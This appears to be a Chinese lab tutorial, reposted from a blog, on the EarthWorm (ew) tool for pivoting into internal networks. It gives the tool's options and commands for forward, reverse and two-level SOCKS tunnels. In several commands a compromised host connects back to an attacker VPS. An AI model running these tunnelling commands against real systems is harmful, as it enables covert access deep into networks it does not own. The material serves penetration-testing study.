【内网—内网转发】代理转发软件EW(Earthworm)
当前位置:点晴教程→知识管理交流
→『 技术文档交流 』
文章目录
一、环境准备:
二、工具:
三、概念:
四、学习目的:
五、ew(Earthworm)介绍:
六、ew(Earthworm)使用说明:
D:\ew>ew_for_Win.exe -h 版本:free1.2 ./xxx ([-options] [values])* 选项 : 例如:./xxx -s ssocksd -h -s 指定工作模式。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去。rssocks 创建反向socks代理服务端rcsocks 反向socks代理客户端lcx_tran 正向tcp端口转发,监听在本地lcx_slave 反向tcp转发客户端lcx_listen 反向tcp服务端-l listenport为服务器打开一个监听端口。 -d refhost 设置反射主机地址。 -e refport 设置反射端口。 -f connhost 设置连接主机地址。 -g connport 设置连接端口。 -h help 显示帮助文本,通过添加 -s 参数,您还可以查看更详细的帮助。 -a about 显示关于页面 -v version 显示版本。 -t usectime 设置超时的毫秒数。 默认的值为 1000 可以参考:http://rootkiter.com/EarthWorm/ 七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:
2. 网络拓扑图:3. 说明:
4. 实验过程:1、在被控主机使用ew打开一个监听端口: ew_for_Win.exe -s ssocksd -l 6666 -s 指定工作模式 ssocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去 -l listenport为服务器打开一个监听端口
在进行测试时可以出现无法连通的现象,这时需要在【被控主机1】的ew命令行里面敲一下回车键: 4、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11: 八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:
1.2 网络拓扑图:1.3 说明:
1.4 实验过程:1、在攻击者的公网vps上添加转接隧道,将6666收到的代理请求转交给反连8888端口的被控服务器: ew_for_Win.exe -s rcsocks -l 6666 -e 8888 -s 指定工作模式 rcsocks 反向socks代理客户端 -l listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。 -e refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。 2、在被控服务器上启动SOCKS v5服务并反弹到公网vps主机的8888端口 ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888 -s 指定工作模式 rssocks 创建反向socks代理服务端 -d refhost设置反弹主机地址(IP)。 -e refport设置反弹端口,反弹给公网vps开启的8888端口。 3、在公网vps出现以下界面,说明连接成功: 4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口:
5、在攻击机上面连接被控服务器所在内网段的内网主机172.16.10.11: 2. 二级代理(一):2.1 场景:
2.2 网络拓扑图:2.3 说明:
2.4 实验过程:1、在公网vps添加转接隧道,将6666端口收到的代理请求流量转交给反连8888端口的被控主机: ew_for_Win.exe -s rcsocks -l 6666 -e 8888 -s 指定工作模式 rcsocks 反向socks代理客户端 -l listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。 -e refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。 2、在被控服主机1上启动监听本机端口9999,并将9999端口接收到的代理流量,转发给攻击者的公网vps的8888端口: ew_for_Win.exe -s lcx_tran -l 被控主机1本机端口 -f 攻击者的公网vps_IP -g 8888ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888-s 指定工作模式 rssocks 创建反向socks代理服务端 -l listenport在被控主机1上设置监听端口9999,将9999收到的 代理请求 转交给攻击者的公网vps的8888端口。 -f connhost 设置连接主机地址(IP)。 -g connport 设置连接端口。 这个命令的意思就是,把本机9999接收到的代理流量,转发到攻击者公网vps的192.168.100.152的8888端口上。 3、在被控主机2启动SOCKS v5代理服务端,并反弹到被控主机1的8888端口 : ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999 -s 指定工作模式 rssocks 创建反向socks代理服务端 -d refhost设置反弹主机地址(IP)。 -e refport设置反弹端口,反弹给公网vps开启的8888端口。 这个命令的意思就是在被控主机2启动SOCKS v5代理服务端,把本机的代理流量反向代理到被控服务器1的9999端口。 4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口: 5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2: 3. 二级代理(二):3.1 场景:
3.2 网络拓扑图:3.3 说明:
3.4 实验过程:1、在攻击者的公网vps添加转接隧道,通过ew的lcx_listen模块监听本机的6666端口,把6666端口接受到的代理请求,转发到反连8888端口的主机: ew_for_Win.exe -s lcx_listen -l 6666 -e 8888 -s 指定工作模式 lcx_listen 反向tcp服务端 -l listenport在代理客户端设置监听端口,将6666收到的 代理请求 转交给反连8888端口的被控服务器。 -e refport设置反弹端口,用于接收被控服务器反弹过来的代理流量。 2、在内网环境2中的【被控主机2】上通过ssocksd模块,开启正向代理服务,通过ssocksd模块监听【被控主机2】本机的9999端口,通过正向代理,把外流量引向内网: ew_for_Win.exe -s ssocksd -l 9999 -s 指定工作模式 ssocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去 -l listenport为服务器打开一个监听端口 3、在内网环境1中的被控主机1运行以下命令,通过ew的lcx_slave流量转发模块,将正向连接到攻击者的公网vps的8888端口,而获得的代理请求流量,转发给内网环境2的【被控主机2】,从而获得内网环境2的内网流量: ew_for_Win.exe -s lcx_slave -d 攻击者的公网vps_IP -e 8888 -f 处于2级内网的被控主机 -g 9999 ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999 -s 指定工作模式 lcx_slave 反向tcp转发客户端 -d refhost设置反弹主机地址(IP)。 -e refport设置反弹端口,反弹给公网vps开启的8888端口 -f connhost 设置连接主机地址 -g connport 设置连接端口 4、使用proxifier代理工具客户端连接公网vps上ew(Earthworm)的监听的端口: 5、在攻击机上面连接第二级内网被控主机所在内网段的内网主机10.1.1.2: 文章来源:https://blog.csdn.net/weixin_45588247/article/details/120238795 该文章在 2023/10/23 18:48:34 编辑过 |
关键字查询
相关文章
正在查询... |